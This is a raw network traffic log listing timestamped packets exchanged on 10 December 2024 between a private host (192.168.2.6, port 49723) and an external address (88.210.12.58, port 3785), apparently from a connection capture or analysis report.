Dec 10, 2024 09:00:50.535746098 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:50.617213011 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:50.640378952 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:50.717207909 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:50.736706972 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:50.818242073 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:50.836775064 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:50.918222904 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:50.937712908 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:51.019208908 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:51.037925959 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:51.120975018 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:51.139229059 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:51.220932961 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:51.240498066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:51.320281982 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:51.340348959 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:51.421197891 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:51.439785004 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:51.521326065 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:51.540899038 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:51.624922037 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:51.641505957 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:51.723192930 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:51.744385958 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:51.824929953 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:51.842812061 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:51.924931049 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:51.944664001 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:52.024228096 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:52.044680119 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:52.125236034 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:52.143934965 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:52.225294113 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:52.244818926 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:52.326258898 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:52.344876051 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:52.426232100 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:52.445636988 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:52.526212931 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:52.545902014 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:52.627185106 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:52.645688057 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:52.728235960 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:52.746608019 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:52.828227043 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:52.847681999 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:52.929204941 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:52.948740005 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:53.030260086 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:53.048595905 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:53.132962942 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:53.150048971 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:53.232954979 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:53.252526999 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:53.332947969 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:53.352607012 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:53.431238890 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:53.452387094 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:53.532248974 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:53.550831079 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:53.632230997 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:53.651848078 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:53.732950926 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:53.751964092 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:53.832242966 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:53.852334023 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:53.932864904 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:53.951889992 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:54.034826040 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:54.052402020 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:54.134296894 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:54.154320955 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:54.234287024 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:54.254364967 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:54.335254908 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:54.353658915 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:54.436263084 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:54.454888105 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:54.537296057 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:54.555659056 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:54.637275934 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:54.656932116 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:54.737236977 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:54.756772995 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:54.838289022 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:54.856668949 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:54.938258886 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:54.957850933 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:55.039268017 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:55.058235884 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:55.140969992 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:55.158936024 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:55.241003990 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:55.260804892 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:55.340967894 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:55.360538006 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:55.441011906 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:55.460390091 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:55.540973902 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:55.560539961 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:55.641278028 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:55.660387039 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:55.742249966 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:55.760873079 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:55.843306065 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:55.861756086 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:55.944252968 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:55.962986946 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:56.044294119 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:56.063673973 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:56.145328999 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:56.164849043 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:56.264786005 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:57.072272062 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:57.172281027 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:57.191760063 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:57.275093079 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:57.291809082 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:57.373289108 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:57.394823074 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:57.475065947 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:57.492703915 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:57.575023890 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:57.594444036 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:57.675162077 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:57.694673061 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:57.775270939 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:57.794483900 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:57.876259089 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:57.894633055 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:57.979110956 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:57.995552063 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:58.081115007 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:58.098659992 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:58.182351112 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:58.200484991 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:58.283308029 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:58.301796913 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:58.383435965 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:58.402708054 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:58.484302044 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:58.502806902 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:58.585505962 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:58.606311083 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:58.686317921 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:58.704885960 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:58.786307096 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:58.805746078 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:58.887317896 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:58.905935049 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:58.987289906 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:59.006815910 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:59.088306904 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:59.106899023 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:59.196523905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:59.207776070 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:59.299067974 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:59.315890074 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:59.403079987 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:59.418591976 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:59.522592068 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:59.522634983 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:59.623354912 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:59.643819094 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:59.727200031 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:59.743032932 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:59.823323965 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:59.846698999 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:00:59.923307896 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:00:59.942832947 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:00.024297953 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:00.042988062 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:00.124758959 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:00.143874884 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:00.225347042 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:00.245217085 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:00.325347900 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:00.344743013 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:00.426320076 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:00.444858074 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:00.526400089 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:00.545751095 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:00.627515078 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:00.645987988 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:00.727334023 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:00.747165918 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:00.827339888 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:00.847289085 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:00.927352905 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:00.946876049 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:01.027369976 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:01.046854973 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:01.127316952 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:01.147104979 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:01.227360964 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:01.246810913 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:01.327352047 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:01.346769094 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:01.428311110 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:01.446759939 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:01.528337002 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:01.547831059 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:01.631047010 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:01.649106979 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:01.730320930 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:01.750446081 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:01.831824064 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:01.849785089 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:01.933051109 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:01.951196909 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:02.033061028 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:02.052474976 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:02.132399082 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:02.152801991 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:02.233333111 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:02.252126932 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:02.333343983 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:02.352683067 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:02.433389902 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:02.452775955 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:02.534336090 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:02.553425074 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:02.634385109 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:02.654933929 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:02.734352112 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:02.753972054 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:02.835380077 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:02.853912115 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:02.935372114 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:02.954855919 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:03.036392927 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:03.054789066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:03.136533976 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:03.155999899 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:03.239448071 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:03.256026030 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:03.338480949 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:03.358941078 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:03.438466072 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:03.458344936 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:03.538374901 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:03.558128119 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:03.639368057 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:03.657830954 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:03.739346981 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:03.758865118 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:03.841698885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:03.858834028 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:03.941330910 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:03.961307049 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:04.061261892 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:04.099140882 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:04.218936920 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:04.502562046 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:04.602437973 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:04.622068882 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:04.703366995 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:04.721885920 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:04.803381920 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:04.822911024 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:04.904369116 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:04.925369024 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:05.004358053 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:05.023674965 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:05.104338884 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:05.123961926 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:05.205090046 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:05.224114895 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:05.305361986 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:05.325324059 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:05.405399084 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:05.424787998 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:05.506380081 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:05.524946928 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:05.607388020 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:05.625895023 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:05.707356930 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:05.726777077 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:05.807368040 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:05.826997995 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:05.911187887 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:05.926973104 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:06.011257887 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:06.030571938 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:06.109381914 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:06.130721092 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:06.210408926 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:06.228785992 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:06.311403036 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:06.329926968 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:06.412436962 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:06.430934906 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:06.513448954 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:06.531863928 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:06.614403009 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:06.633008003 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:06.714373112 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:06.733958006 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:06.815391064 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:06.833848953 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:06.916481972 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:06.934912920 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:07.017406940 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:07.035909891 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:07.118376970 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:07.137543917 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:07.218385935 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:07.238308907 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:07.318397045 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:07.337774992 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:07.421107054 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:07.437901974 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:07.520653009 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:07.541918993 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:07.619419098 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:07.645418882 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:07.720490932 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:07.738830090 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:07.821120024 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:07.840059042 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:07.924381971 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:07.940480947 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:08.021394968 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:08.043828964 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:08.121510983 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:08.140840054 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:08.222446918 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:08.241485119 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:08.322446108 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:08.344199896 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 09:01:08.423398972 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 09:01:08.441931963 CET	3785	49723	88.210.12.58	192.168.2.6
